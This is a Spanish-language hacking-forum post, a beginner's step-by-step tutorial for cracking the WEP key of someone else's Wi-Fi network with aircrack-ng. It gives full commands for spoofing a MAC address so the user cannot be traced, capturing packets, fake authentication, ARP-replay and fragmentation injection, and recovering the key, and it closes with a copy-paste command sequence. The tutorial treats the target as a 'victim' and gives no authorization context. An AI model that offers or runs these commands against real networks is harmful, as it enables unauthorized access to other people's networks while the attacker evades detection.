send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

CLAVES WEP (desde cero)

  • 0 Respuestas
  • 1724 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5301
  • Actividad:
    40%
  • Reputación 29
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« en: Febrero 21, 2011, 05:00:20 pm »
Para aquellos que tienen linux ya sea ubuntu o cualquier versión pueden conseguir aircrack desde una shell fácilmente:
 
 Abre una ventana de terminal (o consola) y escribe lo siguiente:
 
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
apt-get install aircrack-ng
 Y para cambiar tu mac necesitas:
 
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
apt-get install macchanger
 OK pues nada, ahora lo bueno espero que les guste y les ayude mucho.
 
 Voy a ponerlo por pasos porque tendremos que volver para atrás desde el paso nº5 para poner una mac creíble o que ya este asociada con el router.
 
 Paso 1 abre una ventana de terminal y escribe lo siguiente:

Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
sudo airmon-ng
 Aquí te va a decir cual es tu tarjeta inalámbrica, lo normal es que salga wlan0, o eth0, o eth1, cosas así por el estilo, tu te vas a dar cuenta de cual es la tuya, en mi caso es la wlan0 así que es la que voy a usar, tu utiliza la tuya ok.
 
 Paso 2  introduce los siguientes comandos:
 
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
sudo airmon-ng stop wlan0
 isudo fconfig wlan0 down

 Con esto deshabilitas la tarjeta de red inalámbrica para hacerle un cambio de mac, si esta habilitada no te dejara cambiar de mac, cambiaras tu mac por dos razones importantes:

 1. Para que así no haya problemas de que te puedan detectar e impedirte futuras conexiones.
 2. Con tu mac real pueden llegar hasta ti, tu nombre, tus datos y eso no mola nada.
 
 Paso 3 para cambiar la mac escribe los siguientes comandos:
 
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
sudo macchanger --mac 00:11:22:33:44:55 wlan0 (esta mac podría funcionar pero no la recomiendo)

 Lo malo que últimamente da problemas por eso en el paso 5 tendremos que volver al paso  2  y seguir de nuevo
 
 Paso 4 habilita tu tarjeta:
 
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
sudo airmon-ng start wlan0
 Con el paso 3 se cambio la mac de tu tarjeta de red por 00:11:22:33:44:55
 y con el paso 4  habilitaste nuevamente tu tarjeta de red inalámbrica
 
 Paso 5 ahora vas a proceder a ver las redes inalámbricas que están a tu alcance con el siguiente comando:
 
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
sudo airodump-ng wlan0
 Va a salir la lista de las redes inalámbricas, donde dice el BSSID (mac del router que da la señal), PWR (Poder de señal cuanto mas bajo mejor ej: -10 es mas furte que -80), CHN (Canal que se encuentra la red), ENCR (Es el tipo de contraseña que tiene la red, este tutorial es solo para WEP)  ESSID (Nombre de la red inalambrica) STATION ( es la mac del pc que esta conectado al router)
 Se que son mas datos los que se muestran, pero esos no son de importancia, solo vamos a utilizar los que mencione.
 
 Cuando selecciones la red inalámbrica que vamos a atacar aprieta Ctrl + C para parar el proceso y con el mouse sombrea todo el BSSID de esa red y dale click derecho y copiar y lo pegamos en un documento de texto y hacemos lo mismo con la station y volvemos al paso 2.
 
 Para explicar bien esta parte vamos a poner un ejemplo:
 
 STATION 00:11:22:33:44:55
 BSSID 66:77:88:99:00:11
 CHN 6
 ESSID JAZZTEL_70 o la que sea estos datos son los que usaremos, en este punto copiamos la station que es la mac del pc asociada ya con ese router y volvemos al paso 2 para cambiar nuestra mac por esta que es la que funciona seguro,
 
 Paso 6 ahora para ponernos de modo monitor (para capturar paquetes) de esa red pon el siguiente comando:
 
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
airodump-ng -c 6 -w prueba --bssid 66:77:88:99:00:11 wlan0
 Donde:
 
 -c es el numero del canal de la red que estamos atacando
 -w es el archivo donde se van a guardar los paquetes que captures (por defecto están en la dirección /root)
 --bssid es la mac del router de la red que estamos atacando
 wlan0 es nuestra tarjeta inalámbrica
 STATION es la mac del pc que esta conectado al bssid esta mac es la que hay que usar para asociar 100%
 
 Ahora que ya estas capturando datos veras que hay una parte que dice DATA, estos son los paquetes que llevamos capturados o no, si no captura paquetes DATA es que no hay ningun pc conectado al ruoter para poder descifrar una clave wep es necesario 20,000 paquetes o mas.
 Si no esta generando trafico y te podría llevar días incluso semanas  llegar a los 20,000 paquetes,
 
 Pero no te preocupes que ahora te enseñare como generar tráfico en la red.
 
 Paso 7 para asociarte abre otra terminal (consola) donde introducirás los siguientes comandos:
 
 
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
aireplay-ng -1 0 -a 66:77:88:99:00:11 -h 00:11:22:33:44:55 -e ejemplo wlan0
 Donde:
 -a es el bssid de la red que estamos atacando
 -h es la mac falsa que le introducimos a tu tarjeta de red inalámbrica
 -e es el nombre de la red que estamos atacando
 
 Luego cuando salgan 4 líneas de códigos y te diga que la conexión esta succesfull, esto significa que estas conectado en capa 2 al router de la red que estamos atacando.
 Si por alguna razón no se puede conectar (unsuccesfull) algunas de las razones son las siguientes:
 
 -La red a la que quieres atacar esta muy lejos, aconsejo que tengas mínimo de tres rallas de señal.
 -Tu tarjeta de red no puede hacer inyección de paquetes.
 -El router tiene seguridad para evitar este tipo de ataques.
 
 Paso 8 ahora para inyectarle el trafico introduce el siguientes comando:
 
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
aireplay-ng -3 -b 66:77:88:99:00:11 -h 00:11:22:33:44:55 wlan0
 Donde:
 -b es el bssid de la red que estamos atacando
 -h es la mac falsa que le introducimos a tu tarjeta de red inalámbrica
 
 Veras que se empezaron a inyectar paquetes, si vas a ver a la otra terminal donde estas capturando los paquetes te darás cuenta que la DATA va caminando muy rápido.
 
 Paso 9 ahora abre otra terminal (consola) aquí es donde vamos a ejecutar el ataque final que es utilizar los datos capturados para buscar la contraseña  e introduce los siguientes comandos código:
 
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
sudo aircrack-ng prueba-01.cap
 Y también puedes usar este que une todos los paquetes, código:
 
 aircrack-ng *.cap 
 
 EJ: -01.cap, -02.cap, -03.cap esto es por si dejas el ataque para otro momento o si en el paso de inyectar le diste a ctrl.+c y vuelves a intentarlo ya no te crea el -01.cap te creara el -02.cap así los juntas y no pierdes ese paquete)
 
 Donde:
 -Prueba-01.cap es el archivo donde se están capturando los datos
 Deja que el comando se ejecute hasta que te diga un mensaje KEY FOUND!!, esto significa que la contraseña se a descifrado, y te la mostrara al lado derecho de la siguiente forma:
 
 Key found [XX:XX:XX:XX:XX:XX]
 
 Donde las XX son las letras o números de la contraseña, por ejemplo:
 Si te muestra [12:34:56:78:90]
 
 La contraseña para esa red inalámbrica seria 1234567890.
 
 Bueno para aquellos que quieren probar aquí les pongo todos los comandos en el orden que debe de ser para que solo le den copiar:
 
 Paso 1 # airmon-ng
 Paso 2 # airmon-ng stop wlan0
 # ifconfig wlan0 down
 paso3 # macchanger –mac 00:11:22:33:44:55 wlan0
 paso 4 # airmon-ng start wlan0
 paso 5 # airodump-ng wlan0 ( aquí cogeremos la estation del bssid que atacamos y volvemos al paso 2 si no hay ninguna station con nuestra bssid cogemos la que sea porque por lo menos sera real y dará menos problemas.
 # airodump-ng -c (numero del canal) -w nombrearchivo –bssid (bssid) wlan0
 # aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
 # aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
 # aircrack-ng nombredelarchivo.cap
 
 Como se darán cuenta son pocos comandos pero llevan mucha explicación y lo trate de hacer de una forma entendible
 
 Para aquellos que quieren probar otras formas de inyección aquí les dejo otras dos formas que me han funcionado perfecto.
 
 Forma 2:
 # aireplay-ng -1 0 -a <bssid> -h <mac> -e <essid> wlan0
 # aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -h (MAC) wlan0
 Verificar si el BSSID es el que estamos atacando
 
 Forma 3:
 # aireplay-ng -1 0 -a <bssid> -h <mac> -e <essid> wlan0
 # aireplay-ng -5 -b <BSSID> -h <mac> wlan0
 Ver como se llama el archivo .xor
 # packetforge-ng -0 -a <BSSID> -h <mac> -k 255.255.255.255 -l 255.255.255.255 -y <archivo .xor> -w ARP
 # aireplay-ng -2 -r ARP wlan0
 
 Solo aclarar que este tuto es para novatos, por lo que para alguien con algo de experiencia  no tiene que pasar del paso 5 al 2 y seguir Bastaría con saltarse algunos pasos EJ:
 
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
sudo airmon-ng start wlan0
 airodump-ng wlan0  escogemos la mac y la station  pulsamos ctrl+c para parar todo las copiamos y recordamos el canal CH ej: 3,
 
 airmon-ng stop wlan0
 ifconfig wlano down
 macchanger –mac 0B:A1:89:10:26:B0 wlan0
 
 airodump-ng wlan0 –c 3 (como ves ahora si que he puesto el canal para eliminar distracciones y centrarnos en la victima)
 
 airodump-ng -c (numero del canal) -w nombrearchivo –bssid (bssid) wlan0
 
 aireplay-ng -1 0 -a (bssid) -h 0B:A1:89:10:26:B0 -e (essid) wlan0
 
 aireplay-ng -3 -b (bssid) -h 0B:A1:89:10:26:B0 wlan0
 
 aircrack-ng nombredelarchivo.cap

Credits: Hidden

LOG DE MODERACION: Editado para mejor comprension "cl0udswx"  03.14.2015
« Última modificación: Marzo 14, 2015, 06:53:17 pm por Cl0udswX »


 

¿Te gustó el post? COMPARTILO!



OnionPi - Navega de forma anónima desde un punto de acceso wifi

Iniciado por edh_

Respuestas: 3
Vistas: 1810
Último mensaje Enero 16, 2015, 11:20:45 pm
por Gabriela
Guia ataque Bluebug con comandos AT desde PC

Iniciado por ANTRAX

Respuestas: 2
Vistas: 2504
Último mensaje Marzo 24, 2010, 07:55:12 pm
por $ad
Crackear WPA desde Windows

Iniciado por ANTRAX

Respuestas: 13
Vistas: 9036
Último mensaje Abril 08, 2015, 06:01:42 pm
por /d3v/nu11
Multiattack en WifiWay V3.4 (Claves Wep Wpa Wpa2 por defecto)

Iniciado por Aryenal.Bt

Respuestas: 2
Vistas: 3869
Último mensaje Enero 09, 2013, 03:18:40 am
por th3nolo
Claves Wifi Wep con Kali Linux

Iniciado por GangsteR

Respuestas: 2
Vistas: 3123
Último mensaje Febrero 20, 2014, 01:21:28 pm
por GangsteR